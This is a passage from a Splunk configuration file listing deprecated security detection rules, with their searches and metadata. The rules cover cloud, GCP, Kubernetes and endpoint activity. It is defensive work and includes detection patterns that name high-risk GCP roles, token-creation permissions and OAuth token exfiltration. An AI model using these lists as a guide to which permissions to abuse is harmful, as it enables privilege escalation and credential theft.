["AWS Cryptomining", "Suspicious AWS EC2 Activities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - EC2 Instance Started With Previously Unseen User - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Cryptomining", "Suspicious AWS EC2 Activities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=RunInstances [search `cloudtrail` eventName=RunInstances errorCode=success | stats earliest(_time) as firstTime latest(_time) as lastTime by userIdentity.arn | rename userIdentity.arn as arn | inputlookup append=t previously_seen_ec2_launches_by_user.csv | stats min(firstTime) as firstTime, max(lastTime) as lastTime by arn | outputlookup previously_seen_ec2_launches_by_user.csv | eval newUser=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newUser=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename arn as userIdentity.arn | table userIdentity.arn] | rename requestParameters.instanceType as instanceType, responseElements.instancesSet.items{}.instanceId as dest, userIdentity.arn as user | table _time, user, dest, instanceType | `ec2_instance_started_with_previously_unseen_user_filter` [ESCU - Execution of File With Spaces Before Extension - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for processes launched from files with at least five spaces in the name before the extension. This is typically done to obfuscate the file extension by pushing it outside of the default view. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for processes launched from files with at least five spaces in the name before the extension. This is typically done to obfuscate the file extension by pushing it outside of the default view. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = None identified. action.escu.creation_date = 2020-11-19 action.escu.modification_date = 2020-11-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Execution of File With Spaces Before Extension - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows File Extension and Association Abuse", "Masquerading - Rename System Utilities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Execution of File With Spaces Before Extension - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows File Extension and Association Abuse", "Masquerading - Rename System Utilities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for processes launched from files with at least five spaces in the name before the extension. This is typically done to obfuscate the file extension by pushing it outside of the default view. action.notable.param.rule_title = Execution of File With Spaces Before Extension action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process_path) as process_path min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "* .*" by Processes.dest Processes.user Processes.process Processes.process_name | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `execution_of_file_with_spaces_before_extension_filter` [ESCU - Extended Period Without Successful Netbackup Backups - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search returns a list of hosts that have not successfully completed a backup in over a week. Deprecated because it's a infrastructure monitoring. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search returns a list of hosts that have not successfully completed a backup in over a week. Deprecated because it's a infrastructure monitoring. action.escu.how_to_implement = To successfully implement this search you need to first obtain data from your backup solution, either from the backup logs on your hosts, or from a central server responsible for performing the backups. If you do not use Netbackup, you can modify this search for your backup solution. Depending on how often you backup your systems, you may want to modify how far in the past to look for a successful backup, other than the default of seven days. action.escu.known_false_positives = None identified action.escu.creation_date = 2017-09-12 action.escu.modification_date = 2017-09-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Extended Period Without Successful Netbackup Backups - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Monitor Backup Solution"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Extended Period Without Successful Netbackup Backups - Rule action.correlationsearch.annotations = {"analytic_story": ["Monitor Backup Solution"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `netbackup` MESSAGE="Disk/Partition backup completed successfully." | stats latest(_time) as latestTime by COMPUTERNAME | `security_content_ctime(latestTime)` | rename COMPUTERNAME as dest | eval isOutlier=if(latestTime <= relative_time(now(), "-7d@d"), 1, 0) | search isOutlier=1 | table latestTime, dest | `extended_period_without_successful_netbackup_backups_filter` [ESCU - First time seen command line argument - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for command-line arguments that use a `/c` parameter to execute a command that has not previously been seen. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001", "T1059.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for command-line arguments that use a `/c` parameter to execute a command that has not previously been seen. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Legitimate programs can also use command-line arguments to execute. Please verify the command-line arguments to check what command/program is being executed. We recommend customizing the `first_time_seen_cmd_line_filter` macro to exclude legitimate parent_process_name action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - First time seen command line argument - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DHS Report TA18-074A", "Suspicious Command-Line Executions", "Orangeworm Attack Group", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Hidden Cobra Malware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - First time seen command line argument - Rule action.correlationsearch.annotations = {"analytic_story": ["DHS Report TA18-074A", "Suspicious Command-Line Executions", "Orangeworm Attack Group", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Hidden Cobra Malware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001", "T1059.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = cmd.exe Processes.process = "* /c *" by Processes.process Processes.process_name Processes.parent_process_name Processes.dest| `drop_dm_object_name(Processes)`| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search [| tstats `security_content_summariesonly` earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = cmd.exe Processes.process = "* /c *" by Processes.process | `drop_dm_object_name(Processes)` | inputlookup append=t previously_seen_cmd_line_arguments | stats min(firstTime) as firstTime, max(lastTime) as lastTime by process | outputlookup previously_seen_cmd_line_arguments | eval newCmdLineArgument=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newCmdLineArgument=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table process] | `first_time_seen_command_line_argument_filter` [ESCU - GCP Detect accounts with high risk roles by project - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides detection of accounts with high risk roles by projects. Compromised accounts with high risk roles can move laterally or even scalate privileges at different projects depending on organization schema. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = ["Email"] action.escu.eli5 = This search provides detection of accounts with high risk roles by projects. Compromised accounts with high risk roles can move laterally or even scalate privileges at different projects depending on organization schema. action.escu.how_to_implement = You must install splunk GCP add-on. This search works with gcp:pubsub:message logs action.escu.known_false_positives = Accounts with high risk roles should be reduced to the minimum number needed, however specific tasks and setups may be simply expected behavior within organization action.escu.creation_date = 2020-10-09 action.escu.modification_date = 2020-10-09 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Detect accounts with high risk roles by project - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["GCP Cross Account Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - GCP Detect accounts with high risk roles by project - Rule action.correlationsearch.annotations = {"analytic_story": ["GCP Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` data.protoPayload.request.policy.bindings{}.role=roles/owner OR roles/editor OR roles/iam.serviceAccountUser OR roles/iam.serviceAccountAdmin OR roles/iam.serviceAccountTokenCreator OR roles/dataflow.developer OR roles/dataflow.admin OR roles/composer.admin OR roles/dataproc.admin OR roles/dataproc.editor | table data.resource.type data.protoPayload.authenticationInfo.principalEmail data.protoPayload.authorizationInfo{}.permission data.protoPayload.authorizationInfo{}.resource data.protoPayload.response.bindings{}.role data.protoPayload.response.bindings{}.members{} | `gcp_detect_accounts_with_high_risk_roles_by_project_filter` [ESCU - GCP Detect high risk permissions by resource and account - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides detection of high risk permissions by resource and accounts. These are permissions that can allow attackers with compromised accounts to move laterally and escalate privileges. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = ["Email"] action.escu.eli5 = This search provides detection of high risk permissions by resource and accounts. These are permissions that can allow attackers with compromised accounts to move laterally and escalate privileges. action.escu.how_to_implement = You must install splunk GCP add-on. This search works with gcp:pubsub:message logs action.escu.known_false_positives = High risk permissions are part of any GCP environment, however it is important to track resource and accounts usage, this search may produce false positives. action.escu.creation_date = 2020-10-09 action.escu.modification_date = 2020-10-09 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Detect high risk permissions by resource and account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["GCP Cross Account Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - GCP Detect high risk permissions by resource and account - Rule action.correlationsearch.annotations = {"analytic_story": ["GCP Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` data.protoPayload.authorizationInfo{}.permission=iam.serviceAccounts.getaccesstoken OR iam.serviceAccounts.setIamPolicy OR iam.serviceAccounts.actas OR dataflow.jobs.create OR composer.environments.create OR dataproc.clusters.create |table data.protoPayload.requestMetadata.callerIp data.protoPayload.authenticationInfo.principalEmail data.protoPayload.authorizationInfo{}.permission data.protoPayload.response.bindings{}.members{} data.resource.labels.project_id | `gcp_detect_high_risk_permissions_by_resource_and_account_filter` [ESCU - gcp detect oauth token abuse - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides detection of possible GCP Oauth token abuse. GCP Oauth token without time limit can be exfiltrated and reused for keeping access sessions alive without further control of authentication, allowing attackers to access and move laterally. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides detection of possible GCP Oauth token abuse. GCP Oauth token without time limit can be exfiltrated and reused for keeping access sessions alive without further control of authentication, allowing attackers to access and move laterally. action.escu.how_to_implement = You must install splunk GCP add-on. This search works with gcp:pubsub:message logs action.escu.known_false_positives = GCP Oauth token abuse detection will only work if there are access policies in place along with audit logs. action.escu.creation_date = 2020-09-01 action.escu.modification_date = 2020-09-01 action.escu.confidence = high action.escu.full_search_name = ESCU - gcp detect oauth token abuse - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["GCP Cross Account Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - gcp detect oauth token abuse - Rule action.correlationsearch.annotations = {"analytic_story": ["GCP Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` type.googleapis.com/google.cloud.audit.AuditLog |table protoPayload.@type protoPayload.status.details{}.@type protoPayload.status.details{}.violations{}.callerIp protoPayload.status.details{}.violations{}.type protoPayload.status.message | `gcp_detect_oauth_token_abuse_filter` [ESCU - GCP Kubernetes cluster scan detection - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information of unauthenticated requests via user agent, and authentication data against Kubernetes cluster action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.CM"]} action.escu.data_models = ["Email"] action.escu.eli5 = This search provides information of unauthenticated requests via user agent, and authentication data against Kubernetes cluster action.escu.how_to_implement = You must install the GCP App for Splunk (version 2.0.0 or later), then configure stackdriver and set a Pub/Sub subscription to be imported to Splunk. You must also install Cloud Infrastructure data model.Customize the macro kubernetes_gcp_scan_fingerprint_attack_detection to filter out FPs. action.escu.known_false_positives = Not all unauthenticated requests are malicious, but frequency, User Agent and source IPs will provide context. action.escu.creation_date = 2020-04-15 action.escu.modification_date = 2020-04-15 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Kubernetes cluster scan detection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Kubernetes Scanning Activity"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - GCP Kubernetes cluster scan detection - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Scanning Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search provides information of unauthenticated requests via user agent, and authentication data against Kubernetes cluster action.notable.param.rule_title = GCP Kubernetes cluster scan detection action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` data.protoPayload.requestMetadata.callerIp!=127.0.0.1 data.protoPayload.requestMetadata.callerIp!=::1 "data.labels.authorization.k8s.io/decision"=forbid "data.protoPayload.status.message"=PERMISSION_DENIED data.protoPayload.authenticationInfo.principalEmail="system:anonymous" | rename data.protoPayload.requestMetadata.callerIp as src_ip | stats count min(_time) as firstTime max(_time) as lastTime values(data.protoPayload.methodName) as method_name values(data.protoPayload.resourceName) as resource_name values(data.protoPayload.requestMetadata.callerSuppliedUserAgent) as http_user_agent by src_ip data.resource.labels.cluster_name | rename data.resource.labels.cluster_name as cluster_name| `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `gcp_kubernetes_cluster_scan_detection_filter` [ESCU - Identify New User Accounts - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This detection search will help profile user accounts in your environment by identifying newly created accounts that have been added to your network in the past week. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection search will help profile user accounts in your environment by identifying newly created accounts that have been added to your network in the past week. action.escu.how_to_implement = To successfully implement this search, you need to be populating the Enterprise Security Identity_Management data model in the assets and identity framework. action.escu.known_false_positives = If the Identity_Management data model is not updated regularly, this search could give you false positive alerts. Please consider this and investigate appropriately. action.escu.creation_date = 2017-09-12 action.escu.modification_date = 2017-09-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Identify New User Accounts - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Account Monitoring and Controls"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Identify New User Accounts - Rule action.correlationsearch.annotations = {"analytic_story": ["Account Monitoring and Controls"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | from datamodel Identity_Management.All_Identities | eval empStatus=case((now()-startDate)<604800, "Accounts created in last week") | search empStatus="Accounts created in last week"| `security_content_ctime(endDate)` | `security_content_ctime(startDate)`| table identity empStatus endDate startDate | `identify_new_user_accounts_filter` [ESCU - Kubernetes AWS detect most active service accounts by pod - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes service accounts,accessing pods by IP address, verb and decision action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes service accounts,accessing pods by IP address, verb and decision action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with cloudwatch logs action.escu.known_false_positives = Not all service accounts interactions are malicious. Analyst must consider IP, verb and decision context when trying to detect maliciousness. action.escu.creation_date = 2020-06-23 action.escu.modification_date = 2020-06-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes AWS detect most active service accounts by pod - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes AWS detect most active service accounts by pod - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` user.groups{}=system:serviceaccounts objectRef.resource=pods | table sourceIPs{} user.username userAgent verb annotations.authorization.k8s.io/decision | top sourceIPs{} user.username verb annotations.authorization.k8s.io/decision |`kubernetes_aws_detect_most_active_service_accounts_by_pod_filter` [ESCU - Kubernetes AWS detect RBAC authorization by account - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes RBAC authorizations by accounts, this search can be modified by adding top to see both extremes of RBAC by accounts occurrences action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes RBAC authorizations by accounts, this search can be modified by adding top to see both extremes of RBAC by accounts occurrences action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with cloudwatch logs action.escu.known_false_positives = Not all RBAC Authorications are malicious. RBAC authorizations can uncover malicious activity specially if sensitive Roles have been granted. action.escu.creation_date = 2020-06-23 action.escu.modification_date = 2020-06-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes AWS detect RBAC authorization by account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes AWS detect RBAC authorization by account - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` annotations.authorization.k8s.io/reason=* | table sourceIPs{} user.username userAgent annotations.authorization.k8s.io/reason | stats count by user.username annotations.authorization.k8s.io/reason | rare user.username annotations.authorization.k8s.io/reason |`kubernetes_aws_detect_rbac_authorization_by_account_filter` [ESCU - Kubernetes AWS detect sensitive role access - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes accounts accessing sensitve objects such as configmpas or secrets action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes accounts accessing sensitve objects such as configmpas or secrets action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with cloudwatch logs. action.escu.known_false_positives = Sensitive role resource access is necessary for cluster operation, however source IP, namespace and user group may indicate possible malicious use. action.escu.creation_date = 2020-06-23 action.escu.modification_date = 2020-06-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes AWS detect sensitive role access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes AWS detect sensitive role access - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` objectRef.resource=clusterroles OR clusterrolebindings sourceIPs{}!=::1 sourceIPs{}!=127.0.0.1 | table sourceIPs{} user.username user.groups{} objectRef.namespace requestURI annotations.authorization.k8s.io/reason | dedup user.username user.groups{} |`kubernetes_aws_detect_sensitive_role_access_filter` [ESCU - Kubernetes AWS detect service accounts forbidden failure access - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes service accounts with failure or forbidden access status, this search can be extended by using top or rare operators to find trends or rarities in failure status, user agents, source IPs and request URI action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes service accounts with failure or forbidden access status, this search can be extended by using top or rare operators to find trends or rarities in failure status, user agents, source IPs and request URI action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with cloudwatch logs. action.escu.known_false_positives = This search can give false positives as there might be inherent issues with authentications and permissions at cluster. action.escu.creation_date = 2020-06-23 action.escu.modification_date = 2020-06-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes AWS detect service accounts forbidden failure access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Object Access Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes AWS detect service accounts forbidden failure access - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Object Access Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = 